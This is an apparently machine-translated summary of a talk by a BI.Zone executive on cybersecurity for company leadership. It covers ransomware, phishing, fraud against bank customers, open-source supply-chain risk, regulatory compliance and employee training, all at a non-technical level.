BI.Zone Growth Director Rustem Khairetdinov talks about the role of top management in ensuring cybersecurity, the main types of damage from cyber attacks, penetration scenarios and setting goals for the information security department.
Details are in the video and abstract of the speech.
The open practical course “Digital Security for Business Leaders” is available on the website of the Universitet project.
There is no business without numbers anymore. The problem of security has ceased to be a problem of IT specialists and security officers. This is a problem for the top management of a company, regardless of size.
If the company has something to shake and it is cheaper to pay it, then, of course, it will be attacked (by encrypting systems.— “b”). Hackers broke into some kind of digital system, the first thing they are looking for, they are looking for money. The next try is steal data. And now, if it is already impossible to steal the data, then this is a gesture, such, of desperation – encryption.
Sometimes even opposing groups can sit in a company, one got in, the other also got in, found the second, began to sort of try to clean it out, because this is her clearing, we milk this client, sorry. AND we sometimes see such wars of criminals among themselves, who robs a train, as it was in the Wild West. Sorry, this is our train!
Phishing is a way to get a person to enter their details, compromise their account, and so on. And I’m sure you can capture any person, if seriously engaged, draw his psychological portrait.
The task of attackers is to break a hole in the company. And most often the weakest link is a person in IT security.
If we talk about some other ways to cause damage, it all depends on the business, then contextual threats begin. For example, if we talk about government sites, then there a rather serious threat is the publication of some messages on government websites that can lead to something: to a fall in the exchange rate, to some kind of panic.
Today one of the vectors is submission of fake information on behalf of hacked sources. It is necessary to protect loyal sources of information, the websites of your company, where you can express your position.
Each company has its own systems, its own data. If you break into a bank, you need to steal money. The regulator has put a lot of effort into the fact that today it is almost impossible to break a bank head-on. And so today the main vector of attack on banks is the bank’s customers. That is it’s easier to hack your phone or pretend to be a security officerthan to break the bank.
For e-commerce companies, other damage is possible: you can’t steal money there, but you can, for example, order goods from a stolen account.
There is another topic – returns. A man bought something, they brought it to him, he says: I opened the box, and there is a brick instead of an iPhone, please return the money to me. Well, the litigation begins. These are hundreds of millions of rubles annually, such things.
The two main vectors are phishing and vulnerability, social engineering and vulnerability.
In fact, not everyone is attacked en masse, but, for example, everyone who has specific software with a specific vulnerability there.
A targeted attack on a specific company can only be done by a criminal group with huge resources. But to break through vulnerabilities in specific software is quite simple.
The defense strategy in cyberspace is very similar on the strategy of a gazelle running from a lionShe must run faster than the slowest gazelle.
Can do absolute security, but for this you need to turn off the computer and put it in a safe, then the business will not work.
If you comply with the requirements of the regulator, the regulator has already taken care that by complying with these requirements, you have built yourself a basic level of protection.. And then they already proceed from the fact that if you process secret data, these are one requirements, personal data – other requirements, if you have introduced a trade secret regime, there are fourth requirements, fifth ones. Actually there is this rule: if you don’t know how to do it, act according to the law.
When talking about the cybersecurity approach to business, business usually means: I pay money and I will be protected. But often the most that security guards can do is not to prevent something, but to minimize the damage already in the presence of an attack, and then investigate and learn a lesson.
You can’t just buy something, some kind of protection that will always protect you. It needs to be adjusted and adapted. And there must be some people, not only tools, but also people who handle them.
The employer should pay particular attention to increasing digital literacy, so that employees are not the same gap, the same low-quality mortar, because of which this whole wall, all these bricks can just crumble at some point and leave the company completely naked.
In principle, of course, people should not just be taught, listening to a course is good, but people need to train. I would even say in a good way – provoke.
People should not just know, but they should have it in their blood, in their skills. If you do not force a person to do something several times and, if he does it incorrectly, do not send him to additional study – it won’t stick.
Digital Skills are the same skills as washing hands. It’s the same hygiene, only in cyberspace.
How to behave if you use a banking application? At the very least, do not give your unlocked phone to the wrong hands, even take a picture. Especially for this, there is a “photo in locked mode” mode.
Security is considered the antonym of convenience.
A vulnerability is a hole, and an exploit is the key to it, which allows it to pass.
Today, 80-90% of the code is not your own code. And therefore, by the way, programmers will be replaced by robots faster than … Searching for someone else’s code and building something from it is much easier than programming from scratch.. Therefore, there are directly such methods of attack, for a long time already. They put companies on the operssource chat site and, roughly speaking, compromised themselves.
People themselves built someone else’s back door, that is, this back door, simply without checking what kind of software it was, so since we were talking about cement, Brick also needs to be checked.. If we build a wall.
Basically penetration into the system begins much earlier than the attack itselfbecause you need to prepare for the attack. When something is already breaking in the door, it means, in principle, you had an option when you could get together, start, recruit a squad and already meet them fully armed, not allowing them to reach the wall. Give battle in the open field or at a long distance to throw arrows, do not allow to approach the gate.
A good fire is one that didn’t happen, we extinguished it before the moment it flared up.
Today any sabotage is internalbecause a hacker always has a free or unwitting accomplice. This is a person who set it up poorly, rolled out the crooked software, opened an unnecessary link. Iron does not fail, people who test this iron fail.